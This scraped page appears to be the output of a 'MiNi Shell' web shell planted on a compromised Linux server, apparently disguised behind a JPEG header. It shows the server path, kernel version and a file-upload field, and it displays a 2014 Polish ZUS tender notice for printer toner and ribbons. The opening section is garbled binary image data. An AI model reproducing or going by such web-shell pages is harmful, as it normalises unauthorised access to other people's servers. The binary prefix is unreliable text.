JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140929/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140929/321746-N-2014.html

<p class="kh_header"><b>Lublin: Dostawa  materiałów eksploatacyjnych   do drukarek  komputerowych  dla  Oddziałów  ZUS  w:   Biłgoraju,    Kielcach,    Lublinie  i  w  Radomiu</b><br>
<b>Numer ogłoszenia: 321746 - 2014; data zamieszczenia: 29.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Lublinie , ul. Tomasza Zana 36,38c, 20-601 Lublin, woj. lubelskie, tel. 081 5357402, faks 081 5357402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  materiałów eksploatacyjnych   do drukarek  komputerowych  dla  Oddziałów  ZUS  w:   Biłgoraju,    Kielcach,    Lublinie  i  w  Radomiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia, o wartości szacunkowej poniżej 134 tys. euro, jest jednorazowa dostawa fabrycznie nowych, nie regenerowanych i nie napełnianych, zalecanych przez producenta urządzenia (drukarki komputerowej), do którego są przeznaczone,  tonerów (486 szt.) oraz taśm barwiących (115 szt.).  Drukarki  te   eksploatowane  są  w Oddziałach ZUS    w Biłgoraju , w Kielcach,  w Lublinie  i w Radomiu.   Dopuszcza się dostarczenie materiałów równoważnych, tj. innych niż oryginalne - fabrycznie nowych, nieużywanych, nie zawierających żadnych znamion wcześniejszej eksploatacji ( nie regenerowanych  i nie napełnianych),    o wydajności  i jakości wydruku (nierozmazywanie się nadruku, nie przerywanie ciągłości nadruku, nie brudzenie drukowanych stron) nie gorszych od zalecanych przez producenta urządzenia, do którego są przeznaczone   i kompatybilnych  z tym urządzeniem.
   1.1. Wszystkie oferowane materiały  muszą być wolne od wad technicznych, kompletne,  dostarczone w opakowaniach (pojemnikach, obudowach) stosowanych typowo dla danego produktu przez producenta, zaopatrzone w etykiety identyfikujące dany produkt oraz nazwę producenta - odpowiednio do wymagań dla danego rodzaju materiału eksploatacyjnego. 
   1.2. Wykonawca, który oferuje materiały równoważne,  na potwierdzenie spełniania wymagań jakościowych materiałów w zakresie wydajności, złoży wraz z ofertą  dokument  (w szczególności może być to zaświadczenie lub raport z badań) wystawiony przez podmiot niezależny od wykonawcy i producenta (dystrybutora) potwierdzający,  że przedstawiona  w ofercie wydajność znamionowa materiałów ustalona była zgodne  z właściwą normą ISO w zakresie wydajności:  ISO/IEC 19752 - dla tonerów do urządzeń monochromatycznych.
   1.3. Szczegółowy opis przedmiotu zamówienia i warunki jego realizacji zawarte są w  Specyfikacji Istotnych Warunków Zamówienia (SIWZ).
   1.4.  Zamawiający  nie dopuszcza możliwości składanie ofert częściowych.
   1.5. Wspólny Słownik Zamówień:  30125110-5 - dostawa tonerów do drukarek;  30192320-0 dostawa taśm do drukarek igłowych; 

2.Zamawiający przewiduje możliwość zmiany istotnych postanowień umowy - opisane w SIWZ.

3.Zamawiający nie  dopuszcza możliwości składania oferty wariantowej;

4.Nie przewiduje się zamówień  uzupełniających, o których mowa w art. 67 ust.  1 pkt 6   i 7  ustawy z dnia   29 stycznia 2004 roku Prawo zam. Publicznych .( Dz. U.   z 2013 r. , poz. 907   z późn. zm.),  zwanej dalej  ustawą.

5. Wymagany termin wykonania zamówienia:  10 dni kalendarzowych od daty  zawarcia umowy - do każdego  z Oddziałów ZUS   objętych zamówieniem..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.19.23.20-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wniesienie wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań  w tym warunku.
Na potwierdzenie spełniania warunku, wykonawca złoży wraz z ofertą oswiadczenie o spełnianiu warunków  udziału w postepowaniu, o których mowa w art. 22 ust. 1 ustawy (wg wzoru załączonego do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań  w tym warunku.
Na potwierdzenie spełniania warunku, wykonawca złoży wraz z ofertą oswiadczenie o spełnianiu warunków  udziału w postepowaniu, o których mowa w art. 22 ust. 1 ustawy (wg wzoru załączonego do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań  w tym warunku.
Na potwierdzenie spełniania warunku, wykonawca złoży wraz z ofertą oswiadczenie o spełnianiu warunków  udziału w postepowaniu, o których mowa w art. 22 ust. 1 ustawy (wg wzoru załączonego do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań  w tym warunku.
Na potwierdzenie spełniania warunku, wykonawca złoży wraz z ofertą oswiadczenie o spełnianiu warunków  udziału w postepowaniu, o których mowa w art. 22 ust. 1 ustawy (wg wzoru załączonego do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań  w tym warunku.
Na potwierdzenie spełniania warunku, wykonawca złoży wraz z ofertą oswiadczenie o spełnianiu warunków  udziału w postepowaniu, o których mowa w art. 22 ust. 1 ustawy (wg wzoru załączonego do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokument  (w szczególności może być to zaświadczenie lub raport z badań) wystawiony przez podmiot niezależny od wykonawcy i producenta (dystrybutora) potwierdzający,  że przedstawiona  w ofercie wydajność znamionowa materiałów ustalona była zgodne  z właściwą normą ISO w zakresie wydajności:  ISO/IEC 19752 - dla tonerów do urządzeń monochromatycznych.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się  dokumentów, o kt orych mowa w pkt. III.4.3.1), zastępuje się je  dokumentem  zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju  miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

II. W przypadku oferty wspólnej (np. konsorcjum )
1/ spełnianie warunków  udziału w postępowaniu,  o których mowa   w  pkt. III.3 ogłosazenia ( z art. 22 ust.1 ustawy)    będzie oceniane łącznie.
2/ oświadczenie, o którym mowa w pkt. III.4.1)  (z art. 22 ust.1 ustawy), składają  wspólnie wszyscy wykonawcy lub pełnomocnik wykonawcy a  pełnomocnictwo powinno być dołączone do oferty,
3/ brak podstaw do wykluczenia musi wykazać  każdy ze składających ofertę wspólną  poprzez  złożenie wraz z  ofertą dokumentów, o których mowa w pkt. III.4.2). i III.4.4).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>opisane w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, ZUS Oddział  w Lublinie, 20-601 Lublin, ul. T. Zana 38C , piętro IX. pokój    nr 902.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2014 godzina 12:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, piętro IV, pok. Nr 406 - budynek  przy  ul. T. Zana 38C (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. SIWZ zamieszczona będzie na stronie internetowej Zamawiającego: www.zus.pl od dnia zamieszczenia  ogłoszenia w Biuletynie Zamówień Publicznych tj. od  29.09.2014r. do upływu terminu składania ofert;

2.  SIWZ w formie  papierowej (bezpłatna), można odebrać  osobiście w siedzibie Zamawiającego, ZUS Oddział    w Lublinie, 20-601 Lublin, ul. T. Zana 38C , piętro IX. pokój    nr 902 - budynek  38C  lub otrzymać  pocztą;

3.  Pracownikami  uprawnionymi  do kontaktów z wykonawcami są Włodzimierz Kwiatkowski  tel.(81) 535-74-44;  e-mail:  Włodzimierz.Kwiatkowski@zus.pl    i   Włodzimierz Koczkodaj,  tel./fax: (81)  535-77-94; e-mail: Włodzimierz.Koczkodaj@zus.pl  w godzinach :  07:15 -15:15; 


4. Otwarcie ofert nastąpi w dniu 09.10.2014r.  o godzinie 12:30 w siedzibie Zamawiającego, piętro IV, pok. 414 -budynek  36A;


5. Termin związania ofertą - 30 dni od daty składania ofert -  bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert;

6.   Zamawiający nie przewiduje zawarcia umowy ramowej;

7.   Ustanawianie dynamicznego systemu zakupów - nie dotyczy niniejszego zamówienia;

8.  Zamawiający nie przewiduje wyboru  oferty z zastosowaniem aukcji elektronicznej;

9.  Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia,  o których mowa  w art. 151a ustawy; 

10.  Zamawiający nie przewiduje wymagań związanych z realizacją zamówienia (o których mowa   w art. 29  ust. 4 ustawy), tj. dotyczących zatrudnienia osób bezrobotnych  i młodocianych  w celu przygotowania zawodowego, 
 niepełnosprawnych i innych, o których mowa   w przepisach o zatrudnieniu socjalnym lub we właściwych przepisach państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego; 

11.  Na podstawie art. 27.1 ustawy Zamawiający ustala faksową (nr faksu: 81 535-77-94) lub  elektroniczną (Włodzimierz.Koczkodaj@zus.pl)   formę przekazywania informacji,  oświadczeń, wniosków, zawiadomień - w postaci skanów podpisanych przez Wykonawcę lub  Zamawiającego ; przy czym każda ze stron, na żądanie drugiej, potwierdzi niezwłocznie fakt otrzymania korespondencji. Niezależnie od powyższego ustalenia zawsze dopuszczalna jest forma pisemna  ( w szczególności forma ta jest obowiązująca dla  oferty  i dokumentów składanych jako uzupełnienie oferty na wezwanie Zamawiającego w trybie art. 26 ust. 3 ustawy)     z zastrzeżeniem wyjątków przewidzianych w ustawie.  W zakresie  określonym ustawą, Zamawiający będzie zamieszczał  dokumenty i informacje dotyczące niniejszego postępowania  na stronie internetowej   www.zus.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com